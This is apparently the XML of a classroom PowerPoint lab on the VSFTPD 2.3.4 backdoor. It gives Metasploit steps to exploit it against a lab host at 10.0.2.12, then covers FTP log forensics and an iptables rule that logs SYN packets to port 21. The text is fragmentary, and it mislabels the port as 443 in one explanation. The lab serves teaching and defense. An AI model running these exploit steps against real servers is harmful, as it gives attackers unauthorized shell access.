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2"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId23"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="418" r:id="rId2"/>
    <p:sldId id="419" r:id="rId3"/>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="420" r:id="rId5"/>
    <p:sldId id="393" r:id="rId6"/>
    <p:sldId id="400" r:id="rId7"/>
    <p:sldId id="399" r:id="rId8"/>
    <p:sldId id="407" r:id="rId9"/>
    <p:sldId id="401" r:id="rId10"/>
    <p:sldId id="408" r:id="rId11"/>
    <p:sldId id="404" r:id="rId12"/>
    <p:sldId id="405" r:id="rId13"/>
    <p:sldId id="406" r:id="rId14"/>
    <p:sldId id="417" r:id="rId15"/>
    <p:sldId id="416" r:id="rId16"/>
    <p:sldId id="409" r:id="rId17"/>
    <p:sldId id="410" r:id="rId18"/>
    <p:sldId id="413" r:id="rId19"/>
    <p:sldId id="414" r:id="rId20"/>
    <p:sldId id="412" r:id="rId21"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Dosis" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId24"/>
      <p:bold r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular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Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B060402020202020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843" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="145" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="11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 smtClean="0"/>
              <a:t>exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ftp/vsftpd_234_backdoor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845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48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 err="1" smtClean="0"/>
              <a:t>Msf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consle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056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smtClean="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ftp/vsftpd_234_backdoor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smtClean="0"/>
              <a:t>show options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smtClean="0"/>
              <a:t>set RHOST 10.0.2.12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 smtClean="0"/>
              <a:t>exploitls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40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 smtClean="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ftp/vsftpd_234_backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set RHOST 10.0.2.12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -I INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 21 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -j LOG --log-prefix "TCP_SYN"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "TCP_SYN" syslog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816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0398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548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9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xahlee.info/linux/linux_iptables_basics.html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Exploiting Existing Backdoor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00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Use backdoor to access victim’s PC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0332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9" y="874930"/>
            <a:ext cx="4294405" cy="31101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3455" y="1306110"/>
            <a:ext cx="1090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msfconsole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50" y="874931"/>
            <a:ext cx="4302285" cy="3098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3626" y="4256236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Kali old version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05868" y="4158656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Kali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792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84" y="0"/>
            <a:ext cx="3996104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3154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60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1639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986" y="0"/>
            <a:ext cx="2791014" cy="184195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3953629" y="440755"/>
            <a:ext cx="2637945" cy="124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752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server side forensics using FTP Logs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4718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56" y="3157502"/>
            <a:ext cx="8054313" cy="7210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57" y="426578"/>
            <a:ext cx="8060103" cy="236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50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server side forensics using firewall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2" descr="Image result for what is ip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774" y="53340"/>
            <a:ext cx="1144645" cy="114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243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irewall 215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784" y="1082425"/>
            <a:ext cx="6537272" cy="359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09298" y="4589562"/>
            <a:ext cx="27045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https://en.wikipedia.org/wiki/File:Firewall.png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firewall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354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rule for monitoring traffics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89679" y="1263730"/>
            <a:ext cx="8573321" cy="246221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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>iptables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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t> -I INPUT -p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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>tcp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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t> --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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>dport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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit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7D2727"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>21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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>--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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>syn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03336"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t> -j LOG --log-prefix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7D2727"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t>"TCP_SYN"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9680" y="2072640"/>
            <a:ext cx="639149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0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-I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean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:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean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nserts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean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rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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INPUT: for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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packets destined to local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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sockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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-p: protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="20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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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443: destination port 21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="20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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean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syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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:  SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="20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-j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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LOG: when match, log the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty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--log-prefix "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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TCP_SYN" : log prefix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="303336"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="303336"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="inherit"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="303336"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea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2559578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11" y="317148"/>
            <a:ext cx="8393582" cy="589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11" y="1251392"/>
            <a:ext cx="8389274" cy="335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57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Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some services provided by servers might contain a backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gathering information about existing backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>VSFTPD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Backdoor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5467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xahlee.info/linux/linux_iptables_basics.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://vault.centos.org/3.6/docs/html/rhel-rg-en-3/s1-iptables-options.html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5196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VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:endParaRPr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228"/>
            <a:ext cx="9144000" cy="485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84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target information gathering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45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827" y="1952120"/>
            <a:ext cx="3400900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59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0" y="154706"/>
            <a:ext cx="8590610" cy="47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62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Search potential vulnerabilities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92367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71" y="0"/>
            <a:ext cx="77936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05830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1518</TotalTime>
  <Words>205</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>59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Dosis</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Exploiting Existing Backdoor</vt:lpstr>
      <vt:lpstr>Introduction </vt:lpstr>
      <vt:lpstr>VSFTPD Backdoor</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>target information gathering</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Search potential vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Use backdoor to access victim’s PC</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>server side forensics using FTP Logs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>server side forensics using firewall</vt:lpstr>
      <vt:lpstr>What is a firewall</vt:lpstr>
      <vt:lpstr>Create a rule for monitoring traffics</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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214</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-28T01:00:21Z</dcterms:modified>
</cp:coreProperties>
</file>